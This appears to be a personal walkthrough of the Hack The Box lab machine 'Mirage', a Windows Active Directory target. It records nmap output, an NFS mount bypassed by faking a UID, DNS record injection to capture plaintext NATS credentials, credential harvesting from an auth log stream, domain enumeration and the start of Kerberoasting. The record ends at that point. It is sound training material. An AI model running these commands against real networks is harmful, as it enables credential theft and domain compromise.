Mirage

#windows #hard

https://app.hackthebox.com/machines/Mirage

sudo nmap -sCV -vv -oA nmap/mirage 10.10.11.78

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-23 02:17:41Z)
111/tcp  open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after:  2105-07-04T19:58:41
| MD5:     da96 ee88 7537 0dcf 1bd4 4aa3 2104 5393
| SHA-1:   c25a 58cc 950f ce6e 64c7 cd40 e98e bb5a 653f b9ff
| SHA-256: e6fd f3f7 7d3a 2d76 c996 6372 f06b 94da ce1a a9cc d62d 8178 5c08 9bf9 ba4b 9dd6
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after:  2105-07-04T19:58:41
| MD5:     da96 ee88 7537 0dcf 1bd4 4aa3 2104 5393
| SHA-1:   c25a 58cc 950f ce6e 64c7 cd40 e98e bb5a 653f b9ff
| SHA-256: e6fd f3f7 7d3a 2d76 c996 6372 f06b 94da ce1a a9cc d62d 8178 5c08 9bf9 ba4b 9dd6
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
2049/tcp open  nlockmgr      syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after:  2105-07-04T19:58:41
| MD5:     da96 ee88 7537 0dcf 1bd4 4aa3 2104 5393
| SHA-1:   c25a 58cc 950f ce6e 64c7 cd40 e98e bb5a 653f b9ff
| SHA-256: e6fd f3f7 7d3a 2d76 c996 6372 f06b 94da ce1a a9cc d62d 8178 5c08 9bf9 ba4b 9dd6
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after:  2105-07-04T19:58:41
| MD5:     da96 ee88 7537 0dcf 1bd4 4aa3 2104 5393
| SHA-1:   c25a 58cc 950f ce6e 64c7 cd40 e98e bb5a 653f b9ff
| SHA-256: e6fd f3f7 7d3a 2d76 c996 6372 f06b 94da ce1a a9cc d62d 8178 5c08 9bf9 ba4b 9dd6
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38031/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 16776/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 62882/udp): CLEAN (Failed to receive data)
|   Check 4 (port 35574/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-11-23T02:18:31
|_  start_date: N/A
|_clock-skew: 6h59m56s

Add dc01.mirage.htb, mirage.htb to and dc01 to the /etc/hosts file

showmount -e 10.10.11.78
Export list for 10.10.11.78:
/MirageReports (everyone)

showmount -a 10.10.11.78
All mount points on 10.10.11.78:
10.10.10.40:/MirageReports
10.10.10.40:/nfs_share
10.10.14.4:/MirageReports

mkdir mnt
sudo mount -t nfs -o vers=3 10.10.11.78:/MirageReports mnt
cd mnt/

ls -la
total 17493
drwxrwxrwx 2 4294967294 4294967294      64 Nov 22  2025 .
drwxr-xr-x 4 arch       arch          4096 Nov 22 16:31 ..
-rwx------ 1 4294967294 4294967294 8530639 May 20  2025 Incident_Report_Missing_DNS_Record_nats-svc.pdf
-rwx------ 1 4294967294 4294967294 9373389 May 26 18:37 Mirage_Authentication_Hardening_Report.pdf

sudo useradd faker
sudo nvim /etc/passwd
faker:x:4294967294:1001::/home/faker:/usr/bin/bash
sudo -u faker cp * /dev/shm/
cd ..
sudo mv /dev/shm/*.pdf .
sudo chown $USER *.pdf
sudo umount mnt

NATS

./nats-server -V

Open Wireshark (tun0)

nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.15.236
> send

echo -n "434f4e4e454354207b22766572626f7365223a66616c73652c22706564616e746963223a66616c73652c2275736572223a224465765f4163636f756e745f41222c2270617373223a22687835683746353535346650403133333721222c22746c735f7265717569726564223a66616c73652c226e616d65223a224e41545320434c492056657273696f6e20302e322e32222c226c616e67223a22676f222c2276657273696f6e223a22312e34312e31222c2270726f746f636f6c223a312c226563686f223a747275652c2268656164657273223a747275652c226e6f5f726573706f6e64657273223a747275657d0d0a" | xxd -r -p
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}

User: Dev_Account_A
Password: hx5h7F5554fP@1337!

Install NATS cli

go install github.com/nats-io/natscli/nats@latest

nats context add mirage --user Dev_Account_A --password 'hx5h7F5554fP@1337!' --server nts://10.10.11.78:4222
NATS Configuration Context "mirage"

  Server URLs: nts://10.10.11.78:4222
     Username: Dev_Account_A
     Password: ******************
         Path: /home/arch/.config/nats/context/mirage.json

nats --context mirage stream view
[mirage] ? Select a Stream auth_logs
[1] Subject: logs.auth Received: 2025-05-05 04:18:56
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[2] Subject: logs.auth Received: 2025-05-05 04:19:24
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[3] Subject: logs.auth Received: 2025-05-05 04:19:25
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[4] Subject: logs.auth Received: 2025-05-05 04:19:26
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


[5] Subject: logs.auth Received: 2025-05-05 04:19:27
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}


18:19:32 Reached apparent end of data

sudo ntpdate 10.10.11.78
[sudo] password for arch: 
29 Nov 01:25:04 ntpdate[123248]: step time server 10.10.11.78 offset +25202.656434 sec

nxc smb 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
SMB         10.10.11.78     445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.10.11.78     445    dc01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@

rusthound-ce -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -z
---------------------------------------------------
Initializing RustHound-CE at 01:27:12 on 11/29/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-11-29T04:27:12Z INFO  rusthound_ce] Verbosity level: Info
[2025-11-29T04:27:12Z INFO  rusthound_ce] Collection method: All
[2025-11-29T04:27:12Z INFO  rusthound_ce::ldap] Connected to MIRAGE.HTB Active Directory!
[2025-11-29T04:27:12Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-11-29T04:27:12Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-11-29T04:27:13Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=mirage,DC=htb
[2025-11-29T04:27:13Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-11-29T04:27:15Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=mirage,DC=htb
[2025-11-29T04:27:15Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-11-29T04:27:18Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=mirage,DC=htb
[2025-11-29T04:27:18Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-11-29T04:27:18Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=mirage,DC=htb
[2025-11-29T04:27:18Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-11-29T04:27:18Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=mirage,DC=htb
[2025-11-29T04:27:18Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 9%                                                                                                                                                                                     [2025-11-29T04:27:18Z INFO  rusthound_ce::objects::enterpriseca] Found 11 enabled certificate templates
[2025-11-29T04:27:18Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 12 users parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 65 groups parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 21 ous parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 domains parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 74 containers parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 aiacas parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 rootcas parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 33 certtemplates parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-11-29T04:27:18Z INFO  rusthound_ce::json::maker::common] .//20251129012718_mirage-htb_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 01:27:18 on 11/29/25! Happy Graphing!

nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoast krbroast.out
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@ 
